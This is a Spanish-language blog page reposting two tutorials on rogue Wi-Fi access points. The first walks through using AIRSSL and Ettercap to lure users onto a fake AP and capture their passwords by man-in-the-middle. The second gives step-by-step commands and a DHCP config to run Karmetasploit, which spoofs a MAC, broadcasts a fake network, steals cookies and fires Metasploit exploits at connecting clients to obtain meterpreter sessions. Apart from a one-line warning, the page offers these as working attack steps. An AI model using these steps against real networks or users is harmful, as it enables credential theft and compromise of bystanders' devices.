Banner 1

Mostrando entradas con la etiqueta fake ap. Mostrar todas las entradas
Mostrando entradas con la etiqueta fake ap. Mostrar todas las entradas

Crear Punto de acceso Fake

0 comentarios
Hola a tod@s
En el post de hoy realizaremos una PoC sobre seguridad wireless, en la que crearemos un Punto de acceso Fake. Estos puntos de acceso falsos se encuentran repartidos en infinidad de lugares intentando engañar a los “usuarios despistados” creando estos puntos de acceso con nombres similares a los ESSID donde se encuentra el individuo, por ejemplo si nos encontramos en una universidad dan por nombre WIFI UNIVERSIDAD, o si  nos encontramos en un aeropuerto, WFI AEROPUERTO.
Para comenzar yo utilizare la aplicación AIRSSL y para la conexión a internet utilizare mi tarjeta de red interna llamada eth0, esta dará acceso a internet al AP falso, por otro lado utilizare mi adaptador wireless USB con nombre wlan1, este se conectará a la red anfitriona, es decir la tarjeta interna.

Iniciamos la aplicación, al instante nos detectará la interfaz por defecto eth0 y la puerta de enlace.
Imagen 1: Inicio AIRSSL

A continuación seleccionaremos la interfaz que hará de punto acceso fake. En mi caso wlan1.

Imagen 2: Elección Interfaz Fake AP

En el siguiente paso tendremos que dar nombre al ESSID, imaginación al poder, he llegado a ver por ahí ESSID de puntos de acceso falsos con algunos nombres de lo más originales…
Imagen 3: Dar nombre al ESSID

En la siguiente ventana he marcado la opción dos, para que el AP Fake muestre el nombre que le adjudique anteriormente.
 
Imagen 4: Mostrar mismo ESSID AP Fake y Anfitrion
A continuación me dispongo a generar tráfico y me conecto con mi dispositivo android al AP, con esta acción se abrirán cuatro ventanas:

Imagen 5: Mi Dispositivo Android Conectando al AP Fake


  • Ventana 1: En la ventana FAKE AP mostrara el nombre del AP falso y toda la información de este.
  • Ventana 2: Llamada DHCP, en ella veremos todos los dispositivos que se conectan con toda su información, IP, nombre del dispositivo y dirección MAC.
  • Ventana 3: Ettercap, en esta ventana se podrá visualizar las negociaciones del AP y los dispositivos.
  • Ventana 4: Passwords, en esta ventana lógicamente se visualizará las contraseñas siempre que no sea tráfico encriptado, perdón quería decir cifrado, en este momento un amigo +Alejandro Ramos se ha debido quedar medio ciego, jejeje, #Hacker Epico, bromas aparte, también mostrara los usuarios y el sitio que visita.

Imagen 6: MITM, Tráfico y Passwords


Ya sabéis, si vais a conectaros a una WIFI sin ningún tipo de cifrado no os autentiquéis o podrán ver vuestras contraseñas.
 
Fuente: http://www.estacion-informatica.com/2013/06/crear-punto-de-acceso-fake.html

Karmetasploit

0 comentarios

Karmetasploit sirve para crear puntos de acceso falsoscapturar contraseñas, recopilar infomación, y llevar a los ataques de navegador contralos clientes.

Cuando un usuario se conecta a nuestro AP Fake, la dirección IP la estará asignando el servicio DHCP, y posteriormente karmetasploit intentará ejecutar todos los exploits sobre la maquina objetivo en busca de alguna vulnerabilidad e intentará conseguir una sesión meterpreter.

Descargamos You are not allowed to view links. Register or Login

Instalamos dhcpd3-server

Código: 
sudo apt-get install isc-dhcp-server
Una ves instalado procederemos a configurarlo, Quedando de la siguiente manera.

Código: 
#
# Sample configuration file for ISC dhcpd for Debian
#
# Attention: If /etc/ltsp/dhcpd.conf exists, that will be used as
# configuration file instead of this file.
#
#

# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "10.0.0.1";
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# No service will be given on this subnet, but declaring it helps the
# DHCP server to understand the network topology.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#}

# This is a very basic subnet declaration.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#  range 10.0.0.100 10.0.0.254;
#  option routers 10.0.0.1;
#}

Luego procedemos a editar /opt/backbox/msf/data/exploits/capture/http/sites.txt donde están almacenados todos los sitios en los que metasploit intentará robar cookies.
 
Ahora comenzamos poniendo nuestra tarjeta en modo monitor, en mi caso es la wlan0

Código: 
airmon-ng start wlan0
Se activará así la interfaz mon0 la cual podemos cambiarle la dirección MAC si lo creemos necesario:

Código: 
ifconfig mon0 down && macchanger -r mon0 && ifconfig mon0 up
Una vez que la interfaz está lista ya podemos crear nuestro punto de acceso con la ayuda de airbase-ng, tecleemos lo siguiente en la consola:

Código: 
airbase-ng -P -C 30 -c 6 -e “red_falsa” mon0
Donde mon0 es nuestra tarjeta en modo monitor y “red_falsa” es el nombre que queramos darle a nuestra red.

Este paso anterior nos creará una nueva interfaz llamada at0 a la cual vamos a darle una ip y activamos el servidor dhcp desde otra terminal:

Código: 
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
dhcpd -cf /etc/dhcp/dhcpd.conf at0

Ahora iniciamos mestasploit con karma.

Código: 
msfconsole -r karma.rc
Al iniciar karmetasploit les aparecerá:


Fuente: http://foro.infiernohacker.com/index.php?topic=26209.0
Powered by Bad Robot
Helped by Blackubay